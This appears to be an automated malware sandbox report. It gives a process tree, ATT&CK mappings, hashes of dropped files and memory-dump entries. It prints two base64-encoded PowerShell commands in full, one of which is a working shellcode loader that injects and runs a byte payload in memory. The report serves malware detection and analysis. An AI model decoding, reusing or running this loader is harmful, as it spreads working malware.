IAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBGADAAIAAkAEUAdgAzAHYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQARQB2ADMAdgAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAAwAFIAQwAyACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAMABSAEMAMgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiADgALAAwAHgAOAA4ACwAMAB4ADkAZAAsADAAeAAwAGIALAAwAHgAYwA3ACwAMAB4ADUAZQAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4ADQAZQAsADAAeAA5ADkALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeABiADIALAAwAHgANABhACwAMAB4ADYAMgAsADAAeABiAGMALAAwAHgANABhACwAMAB4ADgAYgAsADAAeAAxAGQALAAwAHgAMwA0ACwAMAB4AGEAZgAsADAAeABiAGEALAAwAHgAMABmACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgAZQBmACwAMAB4ADkAZgAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeAA2AGIALAAwAHgANgA0ACwAMAB4ADEAOAAsADAAeAA5ADcALAAwAHgAMQA5ACwAMAB4AGEAMQAsADAAeAAyAGYALAAwAHgAMQAwACwAMAB4ADkANwAsADAAeAA5ADcALAAwAHgAMQBlACwAMAB4AGEAMQAsADAAeAAxADkALAAwAHgAMQA4ACwAMAB4AGMAYwAsADAAeAA2ADEALAAwAHgAMwBiACwAMAB4AGUANAAsADAAeAAwAGUALAAwAHgAYgA2ACwAMAB4ADkAYgAsADAAeABkADUALAAwAHgAYwAxACwAMAB4AGMAYgAsADAAeABkAGEALAAwAHgAMQAyACwAMAB4ADkANAAsADAAeABhADYALAAwAHgAMwAzACwAMAB4AGMAZQAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4AGQAYwAsADAAeABiADgALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeABlADAALAAwAHgANAA3ACwAMAB4AGUAYwAsADAAeAA1ADUALAAwAHgANQA4ACwAMAB4ADMAMAAsADAAeAA4ADkALAAwAHgAYQBhACwAMAB4ADIAZAAsADAAeAA4AGMALAAwAHgAOQAwACwAMAB4AGYAYQAsADAAeAA0ADUALAAwAHgANAA0ACwAMAB4ADgAYQAsADAAeAA3ADEALAAwAHgAMAAxACwAMAB4ADcANQAsADAAeABhAGIALAAwAHgANQA2ACwAMAB4AGUAMgAsADAAeABmADAALAAwAHgANgAyACwAMAB4ADIAYwAsADAAeAAzAGYALAAwAHgAYwBhACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAYgA0ACwAMAB4ADEAOAAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4ADEAZAAsADAAeAA1ADEALAAwAHgAMwBlACwAMAB4AGIANAAsADAAeAA2ADAALAAwAHgANQBkACwAMAB4AGIAMwAsADAAeABjADQALAAwAHgAYQA1ACwAMAB4ADUAYQAsADAAeAAyAGIALAAwAHgAYgAzACwAMAB4AGQAZAAsADAAeAA5ADgALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA0ADAALAAwAHgAYgBhACwAMAB4ADQANAAsADAAeABjADcALAAwAHgAZgAyACwAMAB4ADEAZQAsADAAeAA3ADQALAAwAHgAMAA0ACwAMAB4ADYANAAsADAAeABkADQALAAwAHgANwBhACwAMAB4AGUAMQAsADAAeABlADIALAAwAHgAYgAyACwAMAB4ADkAZQAsADAAeABmADQALAAwAHgAMgA3ACwAMAB4AGMAOQAsADAAeAA5AGIALAAwAHgANwBkACwAMAB4AGMANgAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4AGMANQAsADAAeABlAGQALAAwAHgAYgBhACwAMAB4ADcANgAsADAAeAA5AGUALAAwAHgAOABjACwAMAB4ADkAYgAsADAAeABkADIALAAwAHgANwAxACwAMAB4AGIAMAAsADAAeABmAGMALAAwAHgAYgBiACwAMAB4ADIAZQAsADAAeAAxADQALAAwAHgANwA2ACwAMAB4ADIAOQAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADcANwAsADAAeABiADEALAAwAHgANAA2ACwAMAB4ADcANAAsADAAeABlADAALAAwAHgANwBkACwAMAB4ADgAYQAsADAAeAA4ADcALAAwAHgAZgAwACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgAZgA0ACwAMAB4AGMAMgAsADAAeABiADYALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAA2AGUALAAwAHgAMwBlACwAMAB4ADkAMwAsADAAeAA2ADQALAAwAHgAZQA2ACwAMAB4ADIAOAAsADAAeAAyADQALAAwAHgAYgBhACwAMAB4ADQAMAAsADAAeAAzADgALAAwAHgAZABiACwAMAB4ADMAYgAsADAAeABiADEALAAwAHgAMQAwACwAMAB4ADEAZgAsADAAeAA2AGYALAAwAHgAZQAxACwAMAB4ADAAYQAsADAAeABiADYALAAwAHgAMQAwACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAMwA3ACwAMAB4AGMANQAsADAAeAAwADcALAAwAHgAYwAxACwAMAB4AGEAZgAsADAAeAAyADYALAAwAHgANwBmACwAMAB4AGMANwAsADAAeAA0ADUALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgAOAA4ACwAMAB4AGIAOAAsADAAeAAwAGEALAAwAHgAMABlACwAMAB4AGYAYQAsADAAeAA5ADYALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeABiAGEALAAwAHgANAA2ACwAMAB4ADEAZAAsADAAeAA0AGYALAAwAHgANQAyACwAMAB4ADgAZAAsADAAeAA5ADIALAAwAHgAYgAwACwAMAB4ADQAMgAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgANAAxACwAMAB4AGQANQAsADAAeABiADEALAAwAHgAOAA0ACwAMAB4AGYAOAAsADAAeAA3AGMALAAwAHgANAA5ACwAMAB4ADMANQAsADAAeAAwADQALAAwAHgAYQBiACwAMAB4ADMANwAsADAAeAA3ADUALAAwAHgAOABlACwAMAB4ADUAOAAsADAAeABjADcALAAwAHgAMwBiACwAMAB4ADYANwAsADAAeAAxADQALAAwAHgAZABiACwAMAB4AGEAYgAsADAAeAA4ADcALAAwAHgANgAzACwAMAB4ADgAMQAsADAAeAA3AGQALAAwAHgAOQA3ACwAMAB4ADUAOQAsADAAeABhAGMALAAwAHgAOAAxACwAMAB4ADAAZAAsADAAeAA2ADYALAAwAHgANgA3ACwAMAB4AGQANgAsADAAeABiADkALAAwAHgANgA0ACwAMAB4ADUAZQAsADAAeAAxADAALAAwAHgANgA2ACwAMAB4ADkANgAsADAAeABiADUALAAwAHgAMgBiACwAMAB4AGEAZgAsADAAeAAwADIALAAwAHgANwA2ACwAMAB4ADQAMwAsADAAeABkADAALAAwAHgAYwAyACwAMAB4ADcANgAsADAAeAA5ADMALAAwAHgAOAA2ACwAMAB4ADgAOAAsADAAeAA3ADYALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABlADkALAAwAHgAMgA0ACwAMAB4ADEAZQAsADAAeAA4ADEALAAwAHgAMgA0ACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgAMQA0ACwAMAB4AGMANwAsADAAeAAwADgALAAwAHgANgAwACwAMAB4AGIAZQAsADAAeABhAGYALAAwAHgAYgA2ACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgANgBmACwAMAB4ADQAOAAsADAAeAA4AGEALAAwAHgAMAA4ACwAMAB4ADUAMwAsADAAeAA5AGYALAAwAHgAZgAyACwAMAB4ADcAZQAsADAAeABiAGQALAAwAHgAMgAzADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABPAFYAUQBKAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABPAFYAUQBKAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABPAFYAUQBKACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2960
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbcvdncs.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2660
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD21F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD21E.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD21F.tmp

Filesize
1KB

MD5
217d9d905a87a3a63ae90c5770f3c285

SHA1
db73b3907f6c9fe103476e6f4c72a28917a962d1

SHA256
810ade8f5224d0b24ae432f0fdf9a7aa3115213279532ed4ddd49746ea075764

SHA512
5f419d3a21fc1b42b9be79b047be1559876fcb1dc1deb14a2dbe0473862c2c97420483980a0559d3058314b25fad13a456bd2a49406dd3e4a8fd08371e0943c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\bbcvdncs.dll

Filesize
3KB

MD5
ab638a40023f2d4f94ddf005338748f2

SHA1
1c3324b893e09ece5db4f5983a52bd1eaf2dd17c

SHA256
cfe8602b42b7543099290461b0d40cd1b03b6d7505b13e669837e32fd51e76b0

SHA512
16f5987623f647c8f8952270e9b7f8d7f986fc92d891c6c0e61f5f52f66774bbc5bc71ea0630abcad82b72e7f7cf4c18a813e2882c93897e8e9f8641284c76d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\bbcvdncs.pdb

Filesize
7KB

MD5
301721d46f493af6324a6dc4d1acd519

SHA1
da912e8003305a2d87ebed477cdb90d05a954b16

SHA256
73f50dab0284f6b248c1b4aaeaf79164e32d90798317797cce961482033ca76f

SHA512
8733f36357ff5a382c530505a61e16d9f624fe41ddb31413041c0891dc20aa617d655268f2172f7576ec91f2e2e162aec9b674ade31fd4893ae4316968074738

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1H6B0AFNOCW4IWMBIJFN.temp

Filesize
7KB

MD5
5b3efb50a31da126cd0d18d86b9cd2c4

SHA1
eb690e7eec6052d870311a7c26ec8d921b111764

SHA256
d937b81754433c50a8141be3d2a4ab01dfa7a0fedcb8da0260ae17c57b900bb3

SHA512
b7c36c6066dfda46ac3ae01d6eb1ebde41b0545ba3844f1e9f96271154b664330ad536467f66535435d16e7c38f6f20206f8340345e81254c780faec82310ffa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD21E.tmp

Filesize
652B

MD5
f69c4c0fed2b11ea06f166f83384de8e

SHA1
3a3afdfe4a2bce31860b8d578782743c23116325

SHA256
fca485cf72f9ec02a5e7253a70ca4840b7a3aeded14c1d1e7f2e78a391b44b45

SHA512
b2d496dd158c1f22139aeea5b36eefa1dde155fae9b9e2bf5bc3903e508712520c085dc7cea2aa7836c95965cac6eeba44e4c1cf1ed756bbb25b5f7bd0aee40e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bbcvdncs.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bbcvdncs.cmdline

Filesize
309B

MD5
70fcefa33fbf3e9bea5c0f19b82ece18

SHA1
44db7e21a01809a82710c2db2a871585e8a0ccbd

SHA256
927acc5c2ab841652809f7c32cb04a16cae90d928ad88e445826065315aa5f07

SHA512
0776882c7c824b8581a4f74358daffbb1ac126a4af745bcb22b1c9b8a5f01d4f491e0bb2c93b78a8755d65893551f0ca91d650d33bad28fe91775eac630d1b39

Download Submit
memory/2316-1-0x0000000000300000-0x000000000030A000-memory.dmp

Filesize
40KB

Download
memory/2316-0-0x000007FEF57F3000-0x000007FEF57F4000-memory.dmp

Filesize
4KB

Download
memory/2316-32-0x000007FEF57F3000-0x000007FEF57F4000-memory.dmp

Filesize
4KB

Download
memory/2840-7-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2840-10-0x000007FEF38C0000-0x000007FEF425D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-11-0x000007FEF38C0000-0x000007FEF425D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-12-0x000007FEF38C0000-0x000007FEF425D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-9-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2840-6-0x000007FEF3B7E000-0x000007FEF3B7F000-memory.dmp

Filesize
4KB

Download
memory/2840-8-0x000007FEF38C0000-0x000007FEF425D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-13-0x000007FEF38C0000-0x000007FEF425D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-33-0x000007FEF38C0000-0x000007FEF425D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-34-0x000007FEF3B7E000-0x000007FEF3B7F000-memory.dmp

Filesize
4KB

Download
memory/2960-31-0x0000000002950000-0x0000000002951000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads